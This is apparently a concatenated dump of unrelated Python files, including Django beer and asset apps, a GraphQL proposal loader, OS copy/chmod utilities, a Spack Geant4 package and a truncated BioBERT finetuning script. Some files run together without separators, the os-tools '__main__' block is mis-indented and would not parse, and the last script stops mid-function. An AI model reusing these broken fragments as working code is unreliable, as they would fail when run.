    """Distance (kpc) to the nearest NED galaxy, or None beyond the cutoff."""
    active = True
    extname = 'distance_in_kpc_to_nearest_galaxy' #extractor's name
    cutoff = 1000.0  ## kpc; beyond this the feature is treated as "no result"
    verbose = False

    def extract(self):
        """Return the distance in kpc to the nearest galaxy, or None.

        None is returned when the NED lookup fails (e.g. the NED mysql cache
        server is down), no distance is available, or the distance exceeds
        ``cutoff``.
        """
        n = self.fetch_extr('tmpned')
        #if not isinstance(n,ned.NED):
        #    self.ex_error("bad ned instance")
        try:
            tmp = n.distance_in_kpc_to_nearest_galaxy()
        except Exception:
            # 20081010 dstarr adds try/except in case NED mysql cache server
            # is down (narrowed from a bare except so SystemExit/KeyboardInterrupt
            # still propagate)
            return None
        if tmp['distance'] is None or tmp['distance'] > self.cutoff:
            ## JSB change to None because we assume we dont have a result here
            rez = None
        else:
            rez = tmp['distance']
        if self.verbose:
            # fixed: `print tmp` was Python-2-only syntax; the call form is
            # valid on Python 2.7 and 3.
            print(tmp)
        return rez
|
from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import UserCreationForm
from django.shortcuts import get_object_or_404, render, redirect
from django.http import HttpResponse
from .models import Beer, BeerStyle, Brewery, Hops, Review
def index(request):
    """Render the landing page listing beers, breweries, hops and styles,
    each ordered alphabetically by name."""
    context = {
        'beer_list': Beer.objects.order_by('name'),
        'brewery_list': Brewery.objects.order_by('name'),
        'hops_list': Hops.objects.order_by('name'),
        'styles_list': BeerStyle.objects.order_by('name'),
    }
    return render(request, 'beers/index.html', context)
def beer_detail(request, beer_id):
    """Show one beer with aggregate ratings, the viewer's own rating, and
    rating predictions; 404 for an unknown id."""
    beer = get_object_or_404(Beer, pk=beer_id)
    context = {
        'beer': beer,
        'ratings': beer.rating_data(),
        'user_rating': beer.user_rating_data(request.user),
        'predictions': beer.prediction_data(request.user),
    }
    return render(request, 'beers/beer_detail.html', context)
def hops_detail(request, hops_id):
    """Show one hops variety with its ratings; 404 for an unknown id."""
    hops = get_object_or_404(Hops, pk=hops_id)
    context = {
        'hops': hops,
        'ratings': hops.rating_data(),
        'user_rating': hops.user_rating_data(request.user),
    }
    return render(request, 'beers/hops_detail.html', context)
def brewery_detail(request, brewery_id):
    """Show one brewery with its ratings; 404 for an unknown id."""
    brewery = get_object_or_404(Brewery, pk=brewery_id)
    context = {
        'brewery': brewery,
        'ratings': brewery.rating_data(),
        'user_rating': brewery.user_rating_data(request.user),
    }
    return render(request, 'beers/brewery_detail.html', context)
def style_detail(request, style_id):
    """Show one beer style with its ratings; 404 for an unknown id."""
    style = get_object_or_404(BeerStyle, pk=style_id)
    context = {
        'style': style,
        'ratings': style.rating_data(),
        'user_rating': style.user_rating_data(request.user),
    }
    return render(request, 'beers/style_detail.html', context)
@login_required
def review_create(request):
    """GET: show the blank review form.  POST: validate and store a review.

    Fix: the "missing rating" error page is now rendered with the same
    context as the blank form (``beers`` and ``rating_range``); previously
    only ``error_message`` was passed, so the form's selects rendered empty
    and the user could not retry.
    """
    max_rating = 5
    form_context = {
        'rating_range': range(1, max_rating + 1),
        'beers': Beer.objects.all(),  # queryset is lazy; only evaluated by the template
    }
    if request.method == 'GET':
        return render(request, 'beers/review_create.html', form_context)
    beer = get_object_or_404(Beer, pk=request.POST['beer'])
    try:
        rating_val = request.POST['rating']
    except KeyError:
        form_context['error_message'] = 'you must select a rating!'
        return render(request, 'beers/review_create.html', form_context)
    else:
        review = Review(beer=beer, user=request.user, rating=rating_val)
        review.save()
        return redirect('beer_detail', beer.id)
def signup(request):
    """Register a new account; already-authenticated visitors go straight home.

    On a valid POST the user is created, logged in, and redirected to "/".
    Otherwise the (possibly bound, invalid) form is re-rendered.
    """
    if request.user.is_authenticated:
        return redirect("/")
    if request.method == "POST":
        form = UserCreationForm(request.POST)
        if form.is_valid():
            form.save()
            user = authenticate(
                username=form.cleaned_data.get('username'),
                password=form.cleaned_data.get('password1'),
            )
            login(request, user)
            return redirect("/")
    else:
        form = UserCreationForm()
    return render(request, "registration/signup.html", {"form": form})
|
# Generated by Django 3.2.3 on 2021-06-12 03:51
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: drops IngredientSize.type_size.
    # Do not edit by hand; regenerate with `manage.py makemigrations`.
    dependencies = [
        ('pizza_app', '0006_auto_20210612_0334'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='ingredientsize',
            name='type_size',
        ),
    ]
|
import socket
import sys
from time import sleep
from flask import Flask
# TCP socket to the Raspberry Pi; connected in __main__ before the web
# server starts.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE(review): hard-coded host/port — presumably a LAN device; confirm.
server_address = ('dgonyeoraspi.csh.rit.edu', 10001)
app = Flask(__name__)
@app.route('/')
def hello_world():
    """Root endpoint: plain-text greeting (doubles as a health check)."""
    greeting = 'Hello World!'
    return greeting
if __name__ == '__main__':
    # Connect the Pi socket first so the web app only starts once the link is up.
    print('connecting')
    sock.connect(server_address)
    print('connected')
    # NOTE(review): debug=True runs the Werkzeug reloader, which re-imports
    # the module in a child process — confirm the duplicate connect attempt
    # that causes is acceptable.
    app.run(host='0.0.0.0', debug=True)
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
    """Render the convolution index page with a single placeholder entry."""
    context = {'convolutions': range(1)}
    return render(request, 'convolution/index.html', context)
def add(request):
    """Stub endpoint that responds with the plain text "add"."""
    response = HttpResponse("add")
    return response
from collections import namedtuple
import pandas as pd
from promise import Promise
from promise.dataloader import DataLoader
from graphql import GraphQLError
from app import db
from app.util import (
_SemesterContent,
ProposalInactiveReason,
ProposalStatus,
ProposalType,
)
# Flat, immutable record of everything ProposalLoader returns per proposal.
ProposalContent = namedtuple(
    "ProposalContent",
    [
        "proposal_code",
        "title",
        "proposal_type",
        "status",
        "status_comment",
        "inactive_reason",
        "completion_comments",
        "principal_investigator",
        "principal_contact",
        "liaison_astronomer",
        "blocks",
        "observations",
        "time_allocations",
        "requested_times"
    ],
)
# Time awarded to a partner for a semester at a given priority.
TimeAllocationContent = namedtuple(
    "TimeAllocation", ["priority", "semester", "partner_code", "amount"]
)
# Time requested for a semester, with the minimum useful amount.
RequestedTimeContent = namedtuple(
    "RequestedTime", ["minimum_useful_time", "semester", "partner_time"]
)
# Per-partner time request.
TimeRequestContent = namedtuple(
    "TimeRequest", ["partner_code", "time"]
)
# Free-text completion comment attached to a semester.
CompletionCommentContent = namedtuple(
    "CompletionCommentContent", ["semester", "comment"]
)
class ProposalLoader(DataLoader):
    """Batch DataLoader resolving proposal codes to ProposalContent records.

    All proposal codes requested in one tick are fetched together with a
    handful of batched SQL queries instead of one round-trip per proposal.
    """
    def __init__(self):
        # cache=False: proposal data changes in the database, so always re-query
        DataLoader.__init__(self, cache=False)
    def batch_load_fn(self, proposal_codes):
        # NOTE(review): get_proposals itself returns a Promise, so this wraps
        # a Promise in a Promise — Promise.resolve flattens thenables, but
        # confirm the double wrap is intentional.
        return Promise.resolve(self.get_proposals(proposal_codes))
    def get_proposals(self, proposal_codes):
        """Fetch general info, completion comments, blocks, observations and
        time allocations for every code, then assemble ProposalContent in the
        same order as ``proposal_codes``.  Raises GraphQLError for unknown codes.

        NOTE(review): the ``requested_times`` set is initialised but never
        populated in this method — presumably filled elsewhere; confirm.
        """
        # general proposal info
        sql = """
SELECT Proposal_Code, Title, ProposalType, Status, StatusComment, InactiveReason,
       Leader_Id, Contact_Id, Astronomer_Id
       FROM Proposal AS p
       JOIN ProposalCode AS pc ON p.ProposalCode_Id = pc.ProposalCode_Id
       JOIN ProposalText AS pt ON p.ProposalCode_Id = pt.ProposalCode_Id
       JOIN ProposalGeneralInfo AS pgi ON p.ProposalCode_Id = pgi.ProposalCode_Id
       JOIN ProposalStatus AS ps ON pgi.ProposalStatus_Id = ps.ProposalStatus_Id
       JOIN ProposalType AS type ON pgi.ProposalType_Id = type.ProposalType_Id
       JOIN P1ObservingConditions AS p1o ON p1o.ProposalCode_Id = p.ProposalCode_Id
       LEFT JOIN ProposalInactiveReason AS pir
                 ON pgi.ProposalInactiveReason_Id = pir.ProposalInactiveReason_Id
       JOIN ProposalContact contact ON pc.ProposalCode_Id = contact.ProposalCode_Id
       WHERE Current=1 AND Proposal_Code IN %(proposal_codes)s
"""
        df_general_info = pd.read_sql(
            sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
        )
        values = dict()
        for _, row in df_general_info.iterrows():
            inactive_reason = (
                ProposalInactiveReason.get(row["InactiveReason"])
                if row["InactiveReason"]
                else None
            )
            liaison_astronomer = (
                row["Astronomer_Id"] if pd.notnull(row["Astronomer_Id"]) else None
            )
            # seed one dict per proposal; the collection fields (sets) are
            # filled in by the follow-up queries below
            values[row["Proposal_Code"]] = dict(
                proposal_code=row["Proposal_Code"],
                title=row["Title"],
                time_allocations=set(),
                requested_times=set(),
                proposal_type=ProposalType.get(row["ProposalType"]),
                status=ProposalStatus.get(row["Status"]),
                status_comment=row["StatusComment"],
                inactive_reason=inactive_reason,
                completion_comments=set(),
                principal_investigator=row["Leader_Id"],
                principal_contact=row["Contact_Id"],
                liaison_astronomer=liaison_astronomer,
                blocks=set(),
                observations=set(),
            )
        # completion comments
        sql = """
SELECT Proposal_Code, CompletionComment, Year, Semester
       FROM ProposalText AS pt
       JOIN ProposalCode AS pc on pt.ProposalCode_Id = pc.ProposalCode_Id
       JOIN Semester AS s ON pt.Semester_Id=s.Semester_Id
       WHERE Proposal_Code IN %(proposal_codes)s
"""
        df_completion_comments = pd.read_sql(
            sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
        )
        for _, row in df_completion_comments.iterrows():
            semester = _SemesterContent(year=row["Year"], semester=row["Semester"])
            comment = CompletionCommentContent(
                semester=semester, comment=row["CompletionComment"]
            )
            values[row["Proposal_Code"]]["completion_comments"].add(comment)
        # blocks
        sql = """
SELECT Proposal_Code, Block_Id
       FROM Block AS b
       JOIN ProposalCode AS pc ON b.ProposalCode_Id = pc.ProposalCode_Id
       JOIN BlockStatus AS bs ON b.BlockStatus_Id = bs.BlockStatus_Id
       WHERE Proposal_Code IN %(proposal_codes)s
             AND BlockStatus IN ('Active', 'Completed', 'On Hold')
"""
        df_blocks = pd.read_sql(
            sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
        )
        for _, row in df_blocks.iterrows():
            values[row["Proposal_Code"]]["blocks"].add(row["Block_Id"])
        # observations (i.e. block visits)
        sql = """
SELECT Proposal_Code, BlockVisit_Id
       FROM BlockVisit AS bv
       JOIN Block AS b ON bv.Block_Id = b.Block_Id
       JOIN ProposalCode AS pc ON b.ProposalCode_Id = pc.ProposalCode_Id
       WHERE Proposal_Code IN %(proposal_codes)s
"""
        df_block_visits = pd.read_sql(
            sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
        )
        for _, row in df_block_visits.iterrows():
            values[row["Proposal_Code"]]["observations"].add(row["BlockVisit_Id"])
        # time allocations
        sql = """
SELECT Proposal_Code, Priority, Year, Semester, Partner_Code, TimeAlloc
       FROM PriorityAlloc AS pa
       JOIN MultiPartner AS mp ON pa.MultiPartner_Id = mp.MultiPartner_Id
       JOIN Partner AS p ON mp.Partner_Id = p.Partner_Id
       JOIN Semester AS s ON mp.Semester_Id = s.Semester_Id
       JOIN ProposalCode AS pc ON mp.ProposalCode_Id = pc.ProposalCode_Id
       WHERE Proposal_Code IN %(proposal_codes)s AND TimeAlloc>0
"""
        df_time_alloc = pd.read_sql(
            sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
        )
        for _, row in df_time_alloc.iterrows():
            semester = _SemesterContent(year=row["Year"], semester=row["Semester"])
            values[row["Proposal_Code"]]["time_allocations"].add(
                TimeAllocationContent(
                    priority=row["Priority"],
                    semester=semester,
                    partner_code=row["Partner_Code"],
                    amount=row["TimeAlloc"],
                )
            )
        def proposal_content(proposal_code):
            # Convert the accumulated dict into the immutable record; an
            # unknown code surfaces as a GraphQL error for the client.
            proposal = values.get(proposal_code)
            if not proposal:
                raise GraphQLError(
                    "There exists no proposal with proposal code {code}".format(
                        code=proposal_code
                    )
                )
            return ProposalContent(**proposal)
        # collect results
        proposals = [
            proposal_content(proposal_code) for proposal_code in proposal_codes
        ]
        return Promise.resolve(proposals)
|
import stage
import ugame
# Raw 16-entry colour palette blob consumed by stage.Text.
PALETTE = (b'\xf0\x0f\x00\x00\xcey\xff\xff\xf0\x0f\x00\x19\xfc\xe0\xfd\xe0'
           b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
# 12 fps stage on the handheld's display with a single 16x16 text layer.
game = stage.Stage(ugame.display, 12)
text = stage.Text(16, 16, palette=PALETTE)
game.layers = [text]
# Fill the grid with characters 0..255 (one per cell), echoing each to the
# serial console as it is placed.
i = 0
for y in range(16):
    for x in range(16):
        text.char(x, y, chr(i))
        print(chr(i))
        i += 1
game.render_block()
#!/usr/bin/env python
"""
pyjld.os.tools
Various OS utilities
@author: Jean-Lou Dupont
"""
__author__ = "Jean-Lou Dupont"
__email = "python (at) jldupont.com"
__fileid = "$Id$"
__all__ = ['safe_mkdir','psyspaths','safe_oneup','safe_walkup', 'versa_copy',
'copyFiles', 'copyUpdatedFiles', 'genUpdatedFiles',
'safe_copytree', 'recursive_chmod'
]
import os
import shutil
import sys
from types import *
class pyjld_os_Error(EnvironmentError):
    """Package-level error; safe_copytree raises it with a list of
    (src, dst, reason) tuples describing every failed copy."""
def safe_mkdir(path, mode=0o777):
    """
    Safely creates a directory hierarchy.

    Unlike the standard ``os.makedirs``, this does not raise if the path
    already exists.  ``path`` may be a string or a list of path fragments
    (joined with ``os.path.join``).

    **Returns**: ``(existed, path)`` — ``existed`` is True if the directory
    was already present.

    **Raises**: RuntimeError if the directory cannot be created.
    """
    # expand list if necessary (isinstance replaces the removed-in-Python-3
    # types.ListType; 0o777 replaces the py2-only 0777 literal)
    if isinstance(path, list):
        path = os.path.join(*path)
    try:
        already_exists = os.path.isdir(path)
    except OSError:
        already_exists = False
    if already_exists:
        return True, path
    try:
        os.makedirs(path, mode)
    except OSError:
        # failure is detected below by re-checking the filesystem
        pass
    if not os.path.exists(path):
        # fixed: original message used "%path" and never interpolated the path
        raise RuntimeError(
            "path[%s] can not be created. Is it a valid directory path?" % path)
    # we obviously had to create it.
    return False, path
def versa_copy(src_file, target_path):
    """
    Copies ``src_file`` into the directory ``target_path``.

    ``src_file`` may be a filesystem path string or a list of `path
    fragments` (joined with ``os.path.join``).

    **Returns**: ``(src_file, dest_file)``.
    """
    # fixed: isinstance(list) replaces types.ListType, which no longer
    # exists on Python 3
    if isinstance(src_file, list):
        src_file = os.path.join(*src_file)
    base_name = os.path.basename(src_file)
    dest_file = os.path.join(target_path, base_name)
    shutil.copyfile(src_file, dest_file)
    return (src_file, dest_file)
def copyFiles(src_path, dest_path):
    """
    Copies every file (non-recursive) from ``src_path`` to ``dest_path``.

    **Returns**: list of files copied in the form ::

        [ (src_file, dest_file) ...]
    """
    copied = []
    for name in os.listdir(src_path):
        src = os.path.join(src_path, name)
        dst = os.path.join(dest_path, name)
        shutil.copyfile(src, dst)
        copied.append((src, dst))
    return copied
def genUpdatedFiles(src_path, dest_path):
    """
    Generator yielding the files in ``src_path`` that are newer than their
    counterpart in ``dest_path`` (or missing from it).

    **Yields**: tuples of the form ::

        (src_file, dest_file)
    """
    src_files = os.listdir(src_path)
    # retained from the original: also validates that dest_path exists
    # (raises OSError otherwise)
    os.listdir(dest_path)
    for src_file_name in src_files:
        src_file = os.path.join(src_path, src_file_name)
        src_mtime = os.stat(src_file).st_mtime
        dest_file = os.path.join(dest_path, src_file_name)
        try:
            dest_mtime = os.stat(dest_file).st_mtime
        except OSError:
            # missing destination file counts as infinitely old
            # (0 replaces the py2-only 0L literal)
            dest_mtime = 0
        if src_mtime > dest_mtime:
            yield (src_file, dest_file)
    # fixed: the original ended with `raise StopIteration`, which under
    # PEP 479 (Python 3.7+) escapes the generator as a RuntimeError;
    # simply returning ends the iteration.
def copyUpdatedFiles(src_path, dest_path):
    """
    Copies only the updated files from ``src_path`` into ``dest_path``
    (as determined by genUpdatedFiles).

    **Returns**: list of files copied in the form ::

        [ (src_file, dest_file) ...]
    """
    copied = []
    for src, dst in genUpdatedFiles(src_path, dest_path):
        shutil.copy(src, dst)
        copied.append((src, dst))
    return copied
def psyspaths():
    """
    Pretty print sys.path

    Usage ::

        >>> from pyjld.os import psyspaths
        >>> psyspaths()
    """
    import pprint
    pprint.PrettyPrinter().pprint(sys.path)
def safe_oneup(path):
    """
    Returns the parent of ``path`` in the directory hierarchy.

    **Returns**: `None` on error or once the top has been reached.
    """
    try:
        one_up = os.path.dirname(path)
        if one_up == path:
            # dirname() is a fixed point at the root: we have reached the top
            return None
    except:
        return None
    return one_up
def safe_walkup(path):
    """
    Safely walks up the directory hierarchy, yielding each ancestor of
    ``path`` until the top is reached.

    Usage ::

        >>> cd = os.getcwd()
        >>> for path in safe_walkup(cd):
        ...     print(path)
    """
    path = safe_oneup(path)
    while path is not None:
        yield path
        path = safe_oneup(path)
    # fixed: removed the trailing `raise StopIteration` — under PEP 479
    # (Python 3.7+) it escapes the generator as a RuntimeError; returning
    # normally ends the iteration.
## Quick and dirty because
## __builtins__ differs slightly between Python2.5 and Python2.6
try:
    WindowsError()
except:
    # Calling WindowsError() raises NameError on interpreters that lack it;
    # define a stand-in so safe_copytree below can always catch the name.
    class WindowsError(Exception):
        pass
def safe_copytree(src, dst, symlinks=False, dir_mode=0o777, skip_dirs=[], make_dirs=False):
    """
    Recursively copy a directory tree using copy2(). This function
    is meant to complement the less versatile ``shutil.copytree``.

    The destination directory may not already exist: missing directory
    paths are created on the fly with ``dir_mode`` as mode.

    Directories can be skipped entirely using the ``skip_dirs`` list ::

        ['.svn', '.doctree',]

    If exception(s) occur, a ``pyjld_os_Error`` is raised with a list of
    ``(src, dst, reason)`` tuples.

    If the optional symlinks flag is true, symbolic links in the
    source tree result in symbolic links in the destination tree; if
    it is false, the contents of the files pointed to by symbolic
    links are copied.

    NOTE: the ``skip_dirs=[]`` default is only read, never mutated, so the
    shared-mutable-default pitfall does not apply.
    """
    names = os.listdir(src)
    if make_dirs:
        os.makedirs(dst)
    errors = []
    for name in names:
        srcname = os.path.join(src, name)
        dstname = os.path.join(dst, name)
        try:
            if symlinks and os.path.islink(srcname):
                linkto = os.readlink(srcname)
                os.symlink(linkto, dstname)
            elif os.path.isdir(srcname):
                #JLD: skip dir?
                base_srcname = os.path.basename(srcname)
                if not base_srcname in skip_dirs:
                    safe_copytree(srcname, dstname,
                                  symlinks=symlinks,
                                  dir_mode=dir_mode,
                                  skip_dirs=skip_dirs,
                                  make_dirs=make_dirs)
            else:
                #JLD: make sure target directory exists
                safe_mkdir(dst, dir_mode)
                shutil.copy2(srcname, dstname)
            # XXX What about devices, sockets etc.?
        except (IOError, os.error) as why:
            # fixed: `except E, e` syntax is Python-2-only; `as` works on 2.6+ and 3
            errors.append((srcname, dstname, str(why)))
        # catch the Error from the recursive copytree so that we can
        # continue with other files
        except pyjld_os_Error as err:
            errors.extend(err.args[0])
    try:
        shutil.copystat(src, dst)
    except WindowsError:
        # can't copy file access times on Windows
        pass
    except OSError as why:
        # fixed: was errors.extend(...), which flattened the tuple into three
        # separate list items instead of appending one (src, dst, reason) entry
        errors.append((src, dst, str(why)))
    if errors:
        # fixed: `raise E, args` syntax is Python-2-only
        raise pyjld_os_Error(errors)
def recursive_chmod(path,
                    mode=0o775,
                    do_files=True,
                    do_dirs=True,
                    skip_files=[],
                    skip_dirs=[]):
    """
    Recursive ``chmod``.

    :param path: the top level starting path
    :param mode: the mode to apply (default 0o775 — py3-compatible spelling
                 of the original 0775 literal)
    :param do_files: to perform the operation on files
    :param do_dirs: to perform the operation on dirs
    :param skip_files: to skip files, list the basenames
    :param skip_dirs: to skip dirs, list the basenames
    :return: list of paths whose mode was changed

    NOTE: the list defaults are only read, never mutated, so the shared
    mutable-default pitfall does not apply here.
    """
    paths = []
    for root, dirs, files in os.walk(path):
        if do_files:
            for filename in files:
                this_path = os.path.join(root, filename)
                if os.path.basename(this_path) not in skip_files:
                    os.chmod(this_path, mode)
                    paths.append(this_path)
        if do_dirs:
            for _dir in dirs:
                this_path = os.path.join(root, _dir)
                if os.path.basename(this_path) not in skip_dirs:
                    os.chmod(this_path, mode)
                    paths.append(this_path)
    return paths
# ==============================================
# ==============================================
if __name__ == "__main__":
""" Tests
"""
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
|
from carbon_black.endpoints.base_endpoint import Endpoint
from shared.models import News_Event
from datetime import datetime
class News(Endpoint):
    """Endpoint returning the news events linked to a transaction."""

    def __init__(self) -> None:
        super().__init__()
        return

    def get(self, api_endpoint: str, transaction_id: int) -> dict:
        """Fetch all News_Event rows for ``transaction_id``.

        Returns a list of row dicts on success, or ``{'error': {...}}`` on
        any failure.
        """
        try:
            # int() hardens the f-string interpolation against SQL injection
            # should a non-int ever reach this despite the annotation; for a
            # genuine int this is a no-op.
            results = super().query(
                api_endpoint,
                f"SELECT * FROM News_Event WHERE transaction_id = {int(transaction_id)};")
            return self.make_news_model(results)
        except Exception as err:
            return {
                'error': {
                    'news': str(repr(err))
                }
            }

    def make_news_model(self, sql_results: list):
        """Map raw SQL tuples onto News_Event model dicts.

        Column order assumed: (id, transaction_id, date, title, link,
        source) — matches the SELECT * above; confirm against the schema.
        """
        all_results = []
        for item in sql_results:
            model = News_Event()
            model.data['news_event_id'] = item[0]
            model.data['transaction_id'] = item[1]
            model.data['date_of_article'] = item[2].strftime('%Y-%m-%d')
            model.data['title_of_article'] = item[3]
            model.data['link'] = item[4]
            model.data['source'] = item[5]
            all_results.append(model.data)
        return all_results
|
from spack import *
import platform
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class Geant4Toolfile(Package):
    """Spack package that installs SCRAM tool description XML files for the
    CMS geant4-cms installation (geant4, geant4core, geant4data, geant4vis)."""
    # Dummy payload: the package only generates XML, so it "downloads" a junk file.
    url = 'file://' + os.path.dirname(__file__) + '/../../common/junk.xml'
    version('1.0', '68841b7dcbd130afd7d236afe8fd5b949f017615', expand=False)
    depends_on('geant4-cms')
    def install(self, spec, prefix):
        # Template values substituted into the ${...} placeholders below.
        values = {}
        values['GEANT4_VER'] = spec['geant4-cms'].version
        values['GEANT4_PREFIX'] = spec['geant4-cms'].prefix
        # Umbrella tool pulling in the core, vis and xerces-c tools.
        fname = 'geant4.xml'
        contents = str("""
<tool name="geant4" version="${GEANT4_VER}">
  <info url="http://geant4.web.cern.ch/geant4/"/>
  <use name="geant4core"/>
  <use name="geant4vis"/>
  <use name="xerces-c"/>
</tool>
""")
        write_scram_toolfile(contents, values, fname, prefix)
        # Core Geant4 libraries plus compile flags and environment layout.
        fname = 'geant4core.xml'
        contents = str("""
<tool name="geant4core" version="${GEANT4_VER}">
  <info url="http://geant4.web.cern.ch/geant4/"/>
  <lib name="G4digits_hits"/>
  <lib name="G4error_propagation"/>
  <lib name="G4event"/>
  <lib name="G4geometry"/>
  <lib name="G4global"/>
  <lib name="G4graphics_reps"/>
  <lib name="G4intercoms"/>
  <lib name="G4interfaces"/>
  <lib name="G4materials"/>
  <lib name="G4parmodels"/>
  <lib name="G4particles"/>
  <lib name="G4persistency"/>
  <lib name="G4physicslists"/>
  <lib name="G4processes"/>
  <lib name="G4readout"/>
  <lib name="G4run"/>
  <lib name="G4tracking"/>
  <lib name="G4track"/>
  <lib name="G4analysis"/>
  <flags CXXFLAGS="-DG4MULTITHREADED -DG4USE_STD11 -ftls-model=global-dynamic -pthread"/>
  <client>
    <environment name="GEANT4_BASE" default="${GEANT4_PREFIX}"/>
    <environment name="LIBDIR" default="$$GEANT4_BASE/lib"/>
    <environment name="G4LIB" value="$$LIBDIR"/>
    <environment name="INCLUDE" default="$$GEANT4_BASE/include/Geant4"/>
  </client>
  <runtime name="ROOT_INCLUDE_PATH" value="$$INCLUDE" type="path"/>
  <flags cppdefines="GNU_GCC G4V9"/>
  <use name="clhep"/>
  <use name="root_cxxdefaults"/>
  <flags SKIP_TOOL_SYMLINKS="1"/>
</tool>
""")
        write_scram_toolfile(contents, values, fname, prefix)
        # Aggregator for the Geant4 physics data set tools.
        fname = 'geant4data.xml'
        contents = str("""
<tool name="geant4data" version="${GEANT4_VER}">
  <use name="geant4data_g4abla"/>
  <use name="geant4data_g4emlow"/>
  <use name="geant4data_g4ensdfstate"/>
  <use name="geant4data_g4ndl"/>
  <use name="geant4data_g4neutronsxs"/>
  <use name="geant4data_g4photonevaporation"/>
  <use name="geant4data_g4radioactivedecay"/>
  <use name="geant4data_g4saiddata"/>
</tool>
""")
        write_scram_toolfile(contents, values, fname, prefix)
        # Visualisation libraries layered on top of geant4core.
        fname = 'geant4vis.xml'
        contents = str("""
<tool name="geant4vis" version="${GEANT4_VER}">
  <info url="http://geant4.web.cern.ch/geant4/"/>
  <lib name="G4FR"/>
  <lib name="G4modeling"/>
  <lib name="G4RayTracer"/>
  <lib name="G4Tree"/>
  <lib name="G4visHepRep"/>
  <lib name="G4vis_management"/>
  <lib name="G4visXXX"/>
  <lib name="G4VRML"/>
  <lib name="G4GMocren"/>
  <lib name="G4zlib"/>
  <use name="geant4core"/>
</tool>
""")
        write_scram_toolfile(contents, values, fname, prefix)
|
# Given a string, determine if it is a palindrome, considering
# only alphanumeric characters and ignoring cases.
# Note: For the purpose of this problem, we define empty string as
# valid palindrome.
# Example 1:
# Input: "A man, a plan, a canal: Panama"
# Output: true
# Example 2:
# Input: "race a car"
# Output: false
import re
pattern = re.compile("\W+")
class Solution:
    def isPalindrome(self, s: str) -> bool:
        """Return True if ``s`` reads the same forwards and backwards over
        its alphanumeric characters only, ignoring case.  The empty string
        is a valid palindrome.

        Fix: the original stripped with the regex "\\W+", which keeps
        underscores ("_" is a word character), contradicting the problem's
        "alphanumeric only" rule; str.isalnum matches the spec exactly and
        avoids the regex entirely.
        """
        cleaned = [ch.lower() for ch in s if ch.isalnum()]
        return cleaned == cleaned[::-1]
# Demo: prints True then False for the two LeetCode examples.
solver = Solution()
for phrase in ("A man, a plan, a canal: Panama", "race a car"):
    print(solver.isPalindrome(phrase))
|
from django.db import models
# from project.models import Project
# Create your models here.
class Assetmaster(models.Model):
    # Master record tying an asset (Device) and its serial/registration
    # numbers to a Project.
    # NOTE(review): ForeignKey without on_delete is only valid on Django < 2.0;
    # upgrading requires an explicit on_delete (and a migration) — confirm the
    # target Django version before changing.
    asset_master_id = models.AutoField(primary_key=True)
    project = models.ForeignKey('project.Project')
    asset = models.ForeignKey('Device')
    sn = models.CharField(max_length=100)  # serial number
    no_registrasi = models.CharField(max_length=100)  # registration number
    location = models.TextField(max_length=500,blank=True)
    remark = models.TextField(max_length=500,blank=True)
    # qty = models.IntegerField(max_length=100)
    table_updated = models.DateField(auto_now=True, auto_now_add=False)
    table_creation_timestamp = models.DateField(auto_now=False, auto_now_add=True)
    def __str__(self):
        # NOTE(review): indexes the project's first customer — an empty
        # customer M2M would raise IndexError here; confirm that invariant.
        return "%s - %s - %s - %s" % (self.asset, self.sn, self.no_registrasi, self.project.customer.all()[0])
class Device(models.Model):
    # A hardware or software item that Assetmaster records point at.
    chose_type_device = (
        ('hw', 'Hardware'),
        ('sw', 'Software'),
    )
    device_id = models.AutoField(primary_key=True)
    device_name = models.CharField(max_length=100)
    device_type = models.CharField(max_length=2, choices=chose_type_device)
    spec = models.TextField(max_length=500)
    def __str__(self):
        return self.device_name
class License(models.Model):
    # License attached to an Assetmaster record, with a validity window.
    # NOTE(review): 'Subsciption' is a typo in a displayed value; fixing it
    # changes what users see (and may need data/migration care) — flagged,
    # not changed here.  ForeignKey without on_delete is Django < 2.0 only.
    chose_type_license = (
        ('sub', 'Subsciption'),
        ('sup', 'Support'),
        ('per', 'Perpetual'),
    )
    license_id = models.AutoField(primary_key=True)
    asset_master = models.ForeignKey('Assetmaster')
    license_name = models.CharField(max_length=100)
    type_license = models.CharField(max_length=3, choices=chose_type_license)
    license_start_date = models.DateField(auto_now=False, auto_now_add=False)
    license_end_date = models.DateField(auto_now=False, auto_now_add=False)
    remark = models.TextField(max_length=500,blank=True)
    def __str__(self):
        return "%s - %s" % (self.license_name, self.asset_master.asset.device_name)
|
# coding=utf-8
""" Finetuning BioBERT models on MedMentions.
Adapted from HuggingFace `examples/run_glue.py`"""
import argparse
import glob
import logging
import os
import random
import math
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
import pdb
from transformers import (
WEIGHTS_NAME,
AdamW,
# BertConfig,
# BertForSequenceClassification,
# BertTokenizer,
DistilBertConfig,
DistilBertForSequenceClassification,
DistilBertTokenizer,
XLMConfig,
XLMForSequenceClassification,
XLMTokenizer,
get_linear_schedule_with_warmup,
)
from utils_e2e_span import get_examples, convert_examples_to_features
from modeling_bert import BertModel
from tokenization_bert import BertTokenizer
from configuration_bert import BertConfig
from modeling_e2e_span import DualEncoderBert, PreDualEncoder
from torch.utils.tensorboard import SummaryWriter
logger = logging.getLogger(__name__)
# All pretrained checkpoint shortcut names advertised by the supported
# configs; used only to build the --model_name_or_path help string in main().
ALL_MODELS = sum(
    (tuple(conf.pretrained_config_archive_map.keys()) for conf in [BertConfig]), ()
)
# Maps the --model_type CLI value to (config class, model class, tokenizer class).
MODEL_CLASSES = {
    "bert": (BertConfig, BertModel, BertTokenizer),
}
def set_seed(args):
    """Seed every RNG in play (Python, NumPy, PyTorch, CUDA) from args.seed
    so training runs are reproducible."""
    seed_value = args.seed
